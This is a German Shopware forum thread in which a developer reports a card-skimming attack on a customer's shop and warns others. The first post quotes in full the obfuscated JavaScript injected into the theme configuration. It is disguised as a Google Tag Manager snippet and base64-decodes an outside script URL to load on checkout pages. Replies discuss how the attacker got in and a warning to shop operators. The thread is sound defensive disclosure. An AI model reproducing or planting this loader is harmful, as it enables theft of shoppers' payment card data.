Schadenscode / JS Integration

ottscho · 5. Juli 2023 um 14:39

Hallo zusammen,
bei einem unseren Kunden ist ein Schadenscode in der Theme Konfiguration / eigenes JS hinterlegt worden.
Und zwar hat irgendjemand diesen JS Code hinterlegt:

<!-- Google Tag Manager -->
<script>
(function(n,x,b,z,i,y,m,o){z[‘GoogleAnalyticsObjects’]=o;y=i.createElement (x),n=i.getElementsByTagName(x)[0];if(b.href.match(new RegExp(atob(o)))){y.async=1;y.src=‘//’+z.atob(m);n.parentNode.insertBefore(y,n)}}) (‘fu’,‘script’,window.location,window,document,‘[//www.google-analytics.com/analytics.js','d2Vic3RhdGljcy5vcmcvdHJ1c3RiYWRnZS9ERS4xYmM1NTk0NjQ2NTk2ZjQwZmFhOC5jaHVuay5qcw==','Y2hlY2tvdXQ=](https://ottscho-it.slack.com//www.google-analytics.com/analytics.js','d2Vic3RhdGljcy5vcmcvdHJ1c3RiYWRnZS9ERS4xYmM1NTk0NjQ2NTk2ZjQwZmFhOC5jaHVuay5qcw==','Y2hlY2tvdXQ=)’);
</script>

Analysiert man dies, so wird folgendes Script geladen.
https://webstatics.org/trustbadge/DE.1bc5594646596f40faa8.chunk.js

Das Ganze hat zu Folge, dass ein Fake Paypal Checkout Button angezeigt wurde und Kreditkartendaten abgegriffen wurden. Wer auch immer das gemacht hat muss Ahnung von Shopware haben. Es war sehr auf Shopware zugeschnitten und die Platzierung erfordert auch Ahnung.

Ebenfalls der Dateiname vom eig. Script mit trustbadge…

Evtl. schaut ihr mal in euren Shops nach, ob ihr was ähnliches (ich hoffe nicht) habt.

@Moritz_Naczenski
Evtl. könnt ihr einen Newsletter machen. Ich denke es ist ein wichtiges Thema.

Viele Grüße
Benjamin

marco.steinhaeuser · 5. Juli 2023 um 14:52

Danke, Benny. Ich schau mal, was man da machen kann. Hast Du herausbekommen können, wie der Einstieg passierte? Bzw. was habt Ihr denn getan, um das einzudämmen? Hat Änderung von FTP-Zugangsdaten ausgereicht?

ottscho · 5. Juli 2023 um 17:20

Hi Marco,
Backend Login und ne dann beim Theme Manager / Konfiguration eingetragen.

daniel.naumann · 6. Juli 2023 um 08:57

Backend Login ist nur eine Vermutung. Und es wurde wie folgt eingetragen

SForst · 6. Juli 2023 um 09:14

@daniel.naumann : Ist das hier der gleiche Fall wie der vom Threadersteller oder ist das eine weitere Meldung ?

Grüße

Max_Shop · 6. Juli 2023 um 09:17

Vermutlich unterschiedlich, da es einen eigenen Thread gibt: Shopware spezifische Malware gefunden

daniel.naumann · 6. Juli 2023 um 09:27

Der gleiche, fehlende interne Absprache wer den Thread schreibt aber lesen es ein paar doppelt als eine(r) zu wenig.

marco.steinhaeuser · 7. Juli 2023 um 12:47

Info an Shopbetreiber ist raus. Danke für den Hinweis!

Thema		Antworten	Aufrufe
Wie bekommt man den neuen Google Analytics Tag datenschutzkonform eingebunden? Shopware 5	6	282	26. Mai 2023
Javascript in Shopseite Shopware 3.5 themes--design	4	3171	31. Januar 2014
Google Analytics: Keine Umsätze aus Shop werden angezeigt - Zugriffe funktionieren aber Allgemein	0	249	5. Juli 2017
Head / body mit Code versehen Shopware 6 (German)	4	1865	14. Juni 2022
JavaScript Code in Template einbinden. Shopware 3.5 themes--design	5	4277	31. Mai 2017

Schadenscode / JS Integration

Verwandte Themen